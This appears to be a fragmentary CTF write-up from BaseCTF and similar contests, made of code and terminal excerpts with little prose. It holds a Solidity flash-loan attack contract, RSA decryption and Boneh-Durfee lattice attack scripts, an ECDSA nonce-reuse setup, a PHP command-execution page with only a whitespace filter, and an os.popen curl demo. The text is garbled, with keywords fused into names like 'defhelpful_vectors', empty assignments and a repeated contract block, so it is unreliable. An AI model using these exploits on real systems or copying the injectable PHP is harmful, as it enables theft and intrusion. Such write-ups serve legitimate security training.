0x0007 publickey 0x0003 0x0100 30819f300d06092a864886f70d010101050003818d0030818902818100a70991d69d816a601ffa80976473830f0d3b41276d2790401ddedb18e2d3cab3c315e3222325be42b65adb2878f33f5a03ff5010b23e842a510c1482ad6a42f1e7e5726eb31813e7437640ed7879955f401e172c34d3517241596dd41f8e48d3d1b1c288e6c8752ff65dc27acccba4ba9cd6d0e4de6196cea4da480d3b99d0ed020301000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Has known private key
当参赛选手用 1768.py 分析的时候,就会出现上面这里最后写的 Has known private key,用 -V 参数就可以提取出来,变相降低难度了
>>> os.popen("curl https://baidu.com").read() % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 161 100 161 0 0 482 0 --:--:-- --:--:-- --:--:-- 487 '<html>\n<head><title>302 Found</title></head>\n<body bgcolor="white">\n<center><h1>302 Found</h1></center>\n<hr><center>bfe/1.0.8.18</center>\n</body>\n</html>\n'
PS C:\Users\GamerNoTitle> nc 156.238.233.119 10001 Help Ekko find the best timeline.馃槑馃槑馃槑 Trigger the isSolved() function to obtain the flag.
[1] - Create an account which will be used to deploy the challenge contract [2] - Deploy the challenge contract using your generated account [3] - Get your flag once you meet the requirement [4] - Show the contract source code [-] input your choice: 1 [+] deployer account: 0x6117596A833B37eEC24D83F2b9C741513542a1c1 [+] token: v4.local.EYCF2NyWEjGP50HEnmDWq2sKlUNk7st51_QohF4zNKsWniY5F8zi3PzskjBmZFTwMdyQ8fOtKqzGUmLrrer5PMh9fFSf7iLlKgQmKOSa_pHvrj4lua2lTKPaZfkgG-b_Z7g5ac85Jkm9kpcxTfexOC2CVAOH_10xzOL2g3hOgRvu5A.RWtrb1RpbWVSZXdpbmQ [+] please transfer more than 0.001 test ether to the deployer account for next step
PS C:\Users\GamerNoTitle> nc 156.238.233.119 10001 Help Ekko find the best timeline.馃槑馃槑馃槑 Trigger the isSolved() function to obtain the flag.
[1] - Create an account which will be used to deploy the challenge contract [2] - Deploy the challenge contract using your generated account [3] - Get your flag once you meet the requirement [4] - Show the contract source code [-] input your choice: 2 [-] input your token: v4.local.EYCF2NyWEjGP50HEnmDWq2sKlUNk7st51_QohF4zNKsWniY5F8zi3PzskjBmZFTwMdyQ8fOtKqzGUmLrrer5PMh9fFSf7iLlKgQmKOSa_pHvrj4lua2lTKPaZfkgG-b_Z7g5ac85Jkm9kpcxTfexOC2CVAOH_10xzOL2g3hOgRvu5A.RWtrb1RpbWVSZXdpbmQ [+] contract address: 0xCDF40E3392f49Bc985B06A30269f75035C7001AE [+] transaction hash: 0xded23a521c51c77838cc35e0c1019f1873e5db8ff6c8bf7bd3dd967c22a351c6
import itertools from mnemonic import Mnemonic from eth_account import Account from eth_utils.exceptions import ValidationError from tqdm import tqdm from concurrent.futures import ThreadPoolExecutor, as_completed
contract AttackContract is IAttack { address public token0; address public token1; address public token2; address public dex; address public profitReceiver;
contract AttackContract is IAttack { address public token0; address public token1; address public token2; address public dex; address public profitReceiver;
contract AttackContract is IAttack { address public token0; address public token1; address public token2; address public dex; address public profitReceiver; uint256 public loanAmount;
function attack(address _token0, address _token1, address _token2, address _dex, address _profitReceiver) external { token0 = _token0; token1 = _token1; token2 = _token2; dex = _dex; profitReceiver = _profitReceiver; loanAmount = IIERC20(token0).balanceOf(dex); // Get the maximum loanable amount
// This function is called by the SimpleDEX during flash loan callback function executeOperation(uint256 amount, address token) external { require(msg.sender == dex, "Unauthorized");
// Step 2: Perform triangular arbitrage // 1. Swap USDT (token0) to VNB (token1) uint256 price0 = ISimpleDEX(dex).getPrice(0); // Get price of USDT -> VNB uint256 amountOut1 = (flashLoanAmount * price0) / 1e18; // Amount of VNB received ISimpleDEX(dex).swap(0, flashLoanAmount, true); // Swap USDT to VNB
// 2. Swap VNB (token1) to WMB (token2) uint256 price1 = ISimpleDEX(dex).getPrice(1); // Get price of VNB -> WMB uint256 amountOut2 = (amountOut1 * price1) / 1e18; // Amount of WMB received ISimpleDEX(dex).swap(1, amountOut1, true); // Swap VNB to WMB
// 3. Swap WMB (token2) to USDT (token0) uint256 price2 = ISimpleDEX(dex).getPrice(2); // Get price of WMB -> USDT uint256 amountOut3 = (amountOut2 * price2) / 1e18; // Amount of USDT received ISimpleDEX(dex).swap(2, amountOut2, false); // Swap WMB to USDT
// Step 3: Repay the flash loan require(IIERC20(token).balanceOf(address(this)) >= amount, "Insufficient funds to repay loan"); IIERC20(token).transfer(msg.sender, amount); // Repay the flash loan
// Step 4: Check if profit was made uint256 profit = IIERC20(token).balanceOf(profitReceiver); require(profit > flashLoanAmount, "No profit made"); // Ensure profit was made } }
n = 5732964453789005656202220060994030976008462483974106949360656685503394408870148542074882576415254144726130307660083216338644162341371153570939410807509529736550955786833199064934462338627066079768583784202430670910414267735660410263928222190505796540741350380322668323892350238595203793241016675647281909665554496069021 e = 65537 c = 984765936167568915783737736704322867611565848218162635654661946159274680387765479436495629732147881246546457348407235796531559724831194942893739549488239267819251236343133592127393904508787113965976179961040457169804920173316042295428577459093103897018392603409275993459118346734697394691845258237102468061273125331821 p = 55307187311 q = 103656771073020760439195064547476730316137744551269049245190907471917206440166579782534885819575395415394790074431077161645902639551988653305960753877352961030077065869924492442328429921104546038565837134484082911066593974377139886587211847564818509899677121556066185755492617417642299839879063555427130002611
print(p * q == n)
# 计算私钥 d phi_n = (p - 1) * (q - 1) d = mod_inverse(e, phi_n)
# 解密 m = pow(c, d, n)
# 输出解密结果 print("解密后的消息:", m) decoded_message = bytearray.fromhex(hex(m)[2:]).decode() print(decoded_message)
from Crypto.Util.number import * from secret import flag
p = getPrime(512) q = getPrime(512) n = p * q d = getPrime(299) e = inverse(d,(p-1)*(q-1)) m = bytes_to_long(flag) c = pow(m,e,n) hint1 = p >> (512-70) hint2 = q >> (512-70)
n = 114118679597315994458138232536029700477506764789782067073905766324635160145597602207164997807103187990046901850125798774503781767630201814025142189432534890147340404293319424524872695905368897290630698362559606549134377263394129199145835483978820237203114250882524438599220793209608842281879976692805855046971 e = 60930873636939710528141652371287627298970658591028170597199994159301433213017349592910581153194811053524011559886529831760967700162629319952838130973563991607758850226327915934518549584588693854388996425152821459866209334446088324204759334980239670811977086959854952233887459542997456604453766160444477603017 c = 11058775585296329544235824126670578486484201903851563493984057289075513008773878014007377223222464555346135675900619903617528838701118612201290486747980233570288315027654510774940371032813981282018787668864123759554297515664915358447425647424759926416629451915378248520432568536260902676664298855076689608823 hint1 = 884675140903190287932 hint2 = 1000130673738973880482
import time time.clock = time.time debug = True strict = False helpful_only = True dimension_min = 7# 如果晶格达到该尺寸,则停止移除 # 显示有用矢量的统计数据 defhelpful_vectors(BB, modulus): nothelpful = 0 for ii inrange(BB.dimensions()[0]): if BB[ii,ii] >= modulus: nothelpful += 1
print (nothelpful, "/", BB.dimensions()[0], " vectors are not helpful")
# 显示带有 0 和 X 的矩阵 defmatrix_overview(BB, bound): for ii inrange(BB.dimensions()[0]): a = ('%02d ' % ii) for jj inrange(BB.dimensions()[1]): a += '0'if BB[ii,jj] == 0else'X' if BB.dimensions()[0] < 60: a += ' ' if BB[ii, ii] >= bound: a += '~' #print (a)
# 尝试删除无用的向量 # 从当前 = n-1(最后一个向量)开始 defremove_unhelpful(BB, monomials, bound, current): # 我们从当前 = n-1(最后一个向量)开始 if current == -1or BB.dimensions()[0] <= dimension_min: return BB # 开始从后面检查 for ii inrange(current, -1, -1): # 如果它没有用 if BB[ii, ii] >= bound: affected_vectors = 0 affected_vector_index = 0 # 让我们检查它是否影响其他向量 for jj inrange(ii + 1, BB.dimensions()[0]): # 如果另一个向量受到影响: # 我们增加计数 if BB[jj, ii] != 0: affected_vectors += 1 affected_vector_index = jj # 等级:0 # 如果没有其他载体最终受到影响 # 我们删除它 if affected_vectors == 0: #print ("* removing unhelpful vector", ii) BB = BB.delete_columns([ii]) BB = BB.delete_rows([ii]) monomials.pop(ii) BB = remove_unhelpful(BB, monomials, bound, ii-1) return BB # 等级:1 #如果只有一个受到影响,我们会检查 # 如果它正在影响别的向量 elif affected_vectors == 1: affected_deeper = True for kk inrange(affected_vector_index + 1, BB.dimensions()[0]): # 如果它影响哪怕一个向量 # 我们放弃这个 if BB[kk, affected_vector_index] != 0: affected_deeper = False # 如果没有其他向量受到影响,则将其删除,并且 # 这个有用的向量不够有用 #与我们无用的相比 if affected_deeper andabs(bound - BB[affected_vector_index, affected_vector_index]) < abs(bound - BB[ii, ii]): #print ("* removing unhelpful vectors", ii, "and", affected_vector_index) BB = BB.delete_columns([affected_vector_index, ii]) BB = BB.delete_rows([affected_vector_index, ii]) monomials.pop(affected_vector_index) monomials.pop(ii) BB = remove_unhelpful(BB, monomials, bound, ii-1) return BB # nothing happened return BB """ Returns: * 0,0 if it fails * -1,-1 如果 "strict=true",并且行列式不受约束 * x0,y0 the solutions of `pol` """ defboneh_durfee(pol, modulus, mm, tt, XX, YY): """ Boneh and Durfee revisited by Herrmann and May 在以下情况下找到解决方案: * d < N^delta * |x|< e^delta * |y|< e^0.5 每当 delta < 1 - sqrt(2)/2 ~ 0.292 """ # substitution (Herrman and May) PR.<u, x, y> = PolynomialRing(ZZ) #多项式环 Q = PR.quotient(x*y + 1 - u) # u = xy + 1 polZ = Q(pol).lift() UU = XX*YY + 1 # x-移位 gg = [] for kk inrange(mm + 1): for ii inrange(mm - kk + 1): xshift = x^ii * modulus^(mm - kk) * polZ(u, x, y)^kk gg.append(xshift) gg.sort() # 单项式 x 移位列表 monomials = [] for polynomial in gg: for monomial in polynomial.monomials(): #对于多项式中的单项式。单项式(): if monomial notin monomials: # 如果单项不在单项中 monomials.append(monomial) monomials.sort() # y-移位 for jj inrange(1, tt + 1): for kk inrange(floor(mm/tt) * jj, mm + 1): yshift = y^jj * polZ(u, x, y)^kk * modulus^(mm - kk) yshift = Q(yshift).lift() gg.append(yshift) # substitution # 单项式 y 移位列表 for jj inrange(1, tt + 1): for kk inrange(floor(mm/tt) * jj, mm + 1): monomials.append(u^kk * y^jj) # 构造格 B nn = len(monomials) BB = Matrix(ZZ, nn) for ii inrange(nn): BB[ii, 0] = gg[ii](0, 0, 0) for jj inrange(1, ii + 1): if monomials[jj] in gg[ii].monomials(): BB[ii, jj] = gg[ii].monomial_coefficient(monomials[jj]) * monomials[jj](UU,XX,YY) #约化格的原型 if helpful_only: # #自动删除 BB = remove_unhelpful(BB, monomials, modulus^mm, nn-1) # 重置维度 nn = BB.dimensions()[0] if nn == 0: print ("failure") return0,0 # 检查向量是否有帮助 if debug: helpful_vectors(BB, modulus^mm) # 检查行列式是否正确界定 det = BB.det() bound = modulus^(mm*nn) if det >= bound: print ("We do not have det < bound. Solutions might not be found.") print ("Try with highers m and t.") if debug: diff = (log(det) - log(bound)) / log(2) print ("size det(L) - size e^(m*n) = ", floor(diff)) if strict: return -1, -1 else: print ("det(L) < e^(m*n) (good! If a solution exists < N^delta, it will be found)") # display the lattice basis if debug: matrix_overview(BB, modulus^mm) # LLL if debug: print ("optimizing basis of the lattice via LLL, this can take a long time") #BB = BB.BKZ(block_size=25) BB = BB.LLL() if debug: print ("LLL is done!") # 替换向量 i 和 j ->多项式 1 和 2 if debug: print ("在格中寻找线性无关向量") found_polynomials = False for pol1_idx inrange(nn - 1): for pol2_idx inrange(pol1_idx + 1, nn): # 对于i and j, 构造两个多项式 PR.<w,z> = PolynomialRing(ZZ) pol1 = pol2 = 0 for jj inrange(nn): pol1 += monomials[jj](w*z+1,w,z) * BB[pol1_idx, jj] / monomials[jj](UU,XX,YY) pol2 += monomials[jj](w*z+1,w,z) * BB[pol2_idx, jj] / monomials[jj](UU,XX,YY) # 结果 PR.<q> = PolynomialRing(ZZ) rr = pol1.resultant(pol2) if rr.is_zero() or rr.monomials() == [1]: continue else: print ("found them, using vectors", pol1_idx, "and", pol2_idx) found_polynomials = True break if found_polynomials: break ifnot found_polynomials: print ("no independant vectors could be found. This should very rarely happen...") return0, 0 rr = rr(q, q) # solutions soly = rr.roots() iflen(soly) == 0: print ("Your prediction (delta) is too small") return0, 0 soly = soly[0][0] ss = pol1(q, soly) solx = ss.roots()[0][0] return solx, soly defexample(): ############################################ # 随机生成数据 ########################################## #start_time =time.perf_counter start =time.clock() size=512 length_N = 2*size; ss=0 s=70; M=1# the number of experiments delta = 299/1024 # p = random_prime(2^512,2^511) for i inrange(M): # p = random_prime(2^size,None,2^(size-1)) # q = random_prime(2^size,None,2^(size-1)) # if(p<q): # temp=p # p=q # q=temp N = e = c = hint1 = # p高位 hint2 = # q高位 # print ("p真实高",s,"比特:", int(p/2^(512-s))) # print ("q真实高",s,"比特:", int(q/2^(512-s))) # N = p*q; # 解密指数d的指数( 最大0.292) m = 7# 格大小(越大越好/越慢) t = round(((1-2*delta) * m)) # 来自 Herrmann 和 May 的优化 X = floor(N^delta) # Y = floor(N^(1/2)/2^s) # 如果 p、 q 大小相同,则正确 for l inrange(int(hint1),int(hint1)+1): print('\n\n\n l=',l) pM=l; p0=pM*2^(size-s)+2^(size-s)-1; q0=N/p0; qM=int(q0/2^(size-s)) A = N + 1-pM*2^(size-s)-qM*2^(size-s); #A = N+1 P.<x,y> = PolynomialRing(ZZ) pol = 1 + x * (A + y) #构建的方程 # Checking bounds #if debug: #print ("=== 核对数据 ===") #print ("* delta:", delta) #print ("* delta < 0.292", delta < 0.292) #print ("* size of e:", ceil(log(e)/log(2))) # e的bit数 # print ("* size of N:", len(bin(N))) # N的bit数 #print ("* size of N:", ceil(log(N)/log(2))) # N的bit数 #print ("* m:", m, ", t:", t) # boneh_durfee if debug: ##print ("=== running algorithm ===") start_time = time.time() solx, soly = boneh_durfee(pol, e, m, t, X, Y) if solx > 0: #print ("=== solution found ===") ifFalse: print ("x:", solx) print ("y:", soly) d_sol = int(pol(solx, soly) / e) ss=ss+1
n = 114118679597315994458138232536029700477506764789782067073905766324635160145597602207164997807103187990046901850125798774503781767630201814025142189432534890147340404293319424524872695905368897290630698362559606549134377263394129199145835483978820237203114250882524438599220793209608842281879976692805855046971 d = 697791299328204454525050115930116025227680411125210507143694169686384063060766101784129969 c = 11058775585296329544235824126670578486484201903851563493984057289075513008773878014007377223222464555346135675900619903617528838701118612201290486747980233570288315027654510774940371032813981282018787668864123759554297515664915358447425647424759926416629451915378248520432568536260902676664298855076689608823
import gmpy2 import random import binascii from hashlib import sha256 from sympy import nextprime from Crypto.Cipher import AES from Crypto.Util.Padding import pad from Crypto.Util.number import long_to_bytes from FLAG import flag #flag = 'wdflag{123}'
p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f a = 0 b = 7 xG = 0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798 yG = 0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8 G = (xG, yG) n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141 h = 1 zero = (0,0)
dA = nextprime(random.randint(0, n))
if dA > n: print("warning!!")
defaddition(t1, t2): if t1 == zero: return t2 if t2 == zero: return t2 (m1, n1) = t1 (m2, n2) = t2 if m1 == m2: if n1 == 0or n1 != n2: return zero else: k = (3 * m1 * m1 + a) % p * gmpy2.invert(2 * n1 , p) % p else: k = (n2 - n1 + p) % p * gmpy2.invert((m2 - m1 + p) % p, p) % p m3 = (k * k % p - m1 - m2 + p * 2) % p n3 = (k * (m1 - m3) % p - n1 + p) % p return (int(m3),int(n3))
defmultiplication(x, k): ans = zero t = 1 while(t <= k): if (k &t )>0: ans = addition(ans, x) x = addition(x, x) t <<= 1 return ans
defgetrs(z, k): (xp, yp) = P r = xp s = (z + r * dA % n) % n * gmpy2.invert(k, n) % n return r,s
z1 = random.randint(0, p) z2 = random.randint(0, p) k = random.randint(0, n) P = multiplication(G, k) hA = multiplication(G, dA) r1, s1 = getrs(z1, k) r2, s2 = getrs(z2, k)
import gmpy2 import binascii from hashlib import sha256 from Crypto.Cipher import AES from Crypto.Util.Padding import unpad from Crypto.Util.number import long_to_bytes
# Parameters from the original code p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFC2F a = 0 b = 7 xG = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798 yG = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8 G = (xG, yG) n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 h = 1 zero = (0, 0)
-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgSSlUMfCzg/ysG4ixoi6NKGuWNnv IpZZTRNa045eH2xzzY/ZyRwDojStMH5wxG6nOVvNAY/ETx2XPPC6J1J//nzC1fAN MNCYRa47xIW0RwZBDSABcGnwu3QP2nr7AR0/tZmSClncdwA7RKzlJM8Fs7Zmb502 ZMSv0AxMgN5UMh9FCwIDAQAB -----END PUBLIC KEY-----
<?php highlight_file(__FILE__); $cmd = $_POST['cmd']; // check if space is present in the command // use of preg_match to check if space is present in the command if (preg_match('/\s/', $cmd)) { echo'Space not allowed in command'; exit; }
from Crypto.Util.number import long_to_bytes from sympy import mod_inverse
e = 65537 n = 96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790344897976690691139671461342896437428086142262969360560293350630096355947291129943172939923835317907954465556018515239228081131167407674558849860647237317421 not_phi = 96557532552764825748472768984579682122986562613246880628804186193992067825769559200526147636851266716823209928173635593695093547063827866240583007222790384900615665394180812810697286554008262030049280213663390855887077502992804805794388166197820395507600028816810471093163466639673142482751115353389655533205 c = 37077223015399348092851894372646658604740267343644217689655405286963638119001805842457783136228509659145024536105346167019011411567936952592106648947994192469223516127472421779354488529147931251709280386948262922098480060585438392212246591935850115718989480740299246709231437138646467532794139869741318202945
import sqlite3 import json import re from tqdm import tqdm from datetime import datetime, timezone, timedelta
# Create database file withopen("data.db", "w", encoding="utf8") as f: pass
deftime2ts(TIME_STRING: str) -> int: """ This is a function that can convert the time expression to timestamp Parameter: TIME_STRING(str): The time string Returns: int: The timestamp of the time string """ time_str = TIME_STRING # Transfer timestring to datetime format time dt = datetime.fromisoformat(time_str) # Change time to UTC timestamp = dt.timestamp() return timestamp
# Read flags from file withopen(flagFilePath, "r", encoding="utf8") as f: flags = json.loads(f.read())
# Insert flags on by one for flag in tqdm(flags): flagContent = flag["Flag"] flagTeam = flag["TeamId"] flagChallenge = flag["ChallengeId"] command = "INSERT INTO flags (flag, teamId, challengeId) VALUES (?, ?, ?)" cursor.execute(command, (flagContent, flagTeam, flagChallenge)) conn.commit()
defimportSubmissions(submissionFilePath: str) -> None: # Create submission table # team, challenge, flag, who, ip, time command = "CREATE TABLE submissions (team TEXT, challenge TEXT, flag TEXT, who TEXT, ip TEXT, time INGETER)" cursor = conn.cursor() cursor.execute(command) conn.commit()
# Read submission from file withopen("submissions.log", "r", encoding="utf8") as f: lines = f.readlines()
# Extract data from line and insert into database # [2024/8/31 15:12:50 +08:00 INF] FlagChecker: 队伍 [Aida Bartoletti] 提交题目 [[Week2] ez_crypto] 的答案 [BaseCTF{400e0fde-cc12-3cf8-fbfd-32ae7bfd60e6}] <Merl.Smitham39> @ 108.237.78.233 for line in tqdm(lines): # Extract time time = re.search( r"\[\d{4}/\d{1,2}/\d{1,2} \d{1,2}:\d{1,2}:\d{1,2} \+\d{2}:\d{2} INF\]", line ) time = time.group().strip("[]") if time else"" time = time2tsFromSubmission(time.replace(" +08:00 INF", "")) # Extract team name team = re.search(r"队伍 \[(.+?)\]", line) team = team.group(1) if team else"" # Extract challenge name challenge = re.search(r"题目 \[\[Week\d\](.+?)\]", line) week = re.findall(r"\[Week\d\]", line)[0] challenge = week + " " + challenge.group(1).strip() if challenge else"" # Extract flag flag = re.search(r"BaseCTF\{[^\}]+\}", line) flag = flag.group() if flag else"" # Extract who submit the flag who = re.search(r"<([^<>]+)> @ \d+\.\d+\.\d+\.\d+$", line) who = who.group(1) if who else"" # Extract the ip address ip = re.search(r" @ (\d+\.\d+\.\d+\.\d+)", line) ip = ip.group(1) if ip else"" command = "INSERT INTO submissions (team, challenge, flag, who, ip, time) VALUES (?, ?, ?, ?, ?, ?)" cursor.execute(command, (team, challenge, flag, who, ip, time)) conn.commit()
defimportTeamsAndUsers(teamsFilePath: str) -> None: # Create teams table # id(PRIMARY), name, member1, member2 command = "CREATE TABLE teams (id TEXT PRIMARY KEY, name TEXT, member1 TEXT, member2 TEXT)" cursor = conn.cursor() cursor.execute(command) command = "CREATE TABLE users (id TEXT PRIMARY KEY, name TEXT)" cursor.execute(command) conn.commit()
# Read teams from file withopen(teamsFilePath, "r", encoding="utf8") as f: teams = json.loads(f.read())
# Insert team data into database for team in tqdm(teams): teamId = team["Id"] teamName = team["Name"] member1 = team["Members"][0]["Id"] member2 = None command = "INSERT INTO users (id, name) VALUES (?, ?)" cursor.execute( command, (team["Members"][0]["Id"], team["Members"][0]["UserName"]) ) iflen(team["Members"]) == 2: member2 = team["Members"][1]["Id"] cursor.execute( command, (team["Members"][1]["Id"], team["Members"][1]["UserName"]) ) command = "INSERT INTO teams (id, name, member1, member2) VALUES (?, ?, ?, ?)" cursor.execute(command, (teamId, teamName, member1, member2)) conn.commit()
if __name__ == "__main__": importChallenges("challenges.json") importFlags("flags.json") importSubmissions("submission.log") importTeamsAndUsers("teams.json")
defgetChallengeExpireTimeFromName(challenge: str) -> int: # Function for getting expire time of the challenge cursor = conn.cursor() command = "SELECT endat FROM challenges WHERE name=?" cursor.execute(command, (challenge,)) time = int(cursor.fetchone()[0].replace(".0", "")) return time
defgetTeamSubmissionsFromTeamName(team_name: str) -> list: # Function for getting submission of the team cursor = conn.cursor() command = "SELECT time, challenge FROM submissions WHERE team=?" cursor.execute(command, (team_name,)) submission_list = cursor.fetchall() return submission_list
defgetChallengeIdFromName(challenge_name: str) -> str: # Function for getting challengeId from name cursor = conn.cursor() command = "SELECT id FROM challenges WHERE name=?" cursor.execute(command, (challenge_name,)) challenge_id = cursor.fetchone()[0] return challenge_id
if __name__ == "__main__": # All the expire time are the same, so use one as all expire_time = getChallengeExpireTimeFromName("[Week3] ez_log") submission_list = getTeamSubmissionsFromTeamName("Damien Schroeder") # Get all expired challenges expired_challenge_list = [] submission_list.sort(key=lambda x: x[0]) # Sort by submit time for submission in submission_list: if submission[0] > expire_time: print(submission[0], expire_time, submission[1]) expired_challenge_list.append(submission[1]) # Get all ids of expired challenges expired_challenge_id_list = [] for challenge in expired_challenge_list: expired_challenge_id_list.append(getChallengeIdFromName(challenge)) # Connect all the challenge ids with comma expired_challenge_id_string = "" for challenge_id in expired_challenge_id_list: if expired_challenge_id_string == "": expired_challenge_id_string += challenge_id else: expired_challenge_id_string += "," + challenge_id # Calculate MD5 result = hashlib.md5(expired_challenge_id_string.encode()).hexdigest() print(f"BaseCTF\{{result}\}")
BaseCTF 崩啦 III - 帮我查查队伍的解题
该系列后面的题目我放下面,因为没什么时间做了,就没有题解了
Jailyn32: 你好, 我是 Rick Hyatt 队伍的队长, 你能帮我看看我们队伍现在还有哪些题目没有解出吗?
<?php highlight_file(__FILE__); $cmd = $_POST['cmd']; // check if space is present in the command // use of preg_match to check if space is present in the command if (preg_match('/\s/', $cmd)) { echo'Space not allowed in command'; exit; }
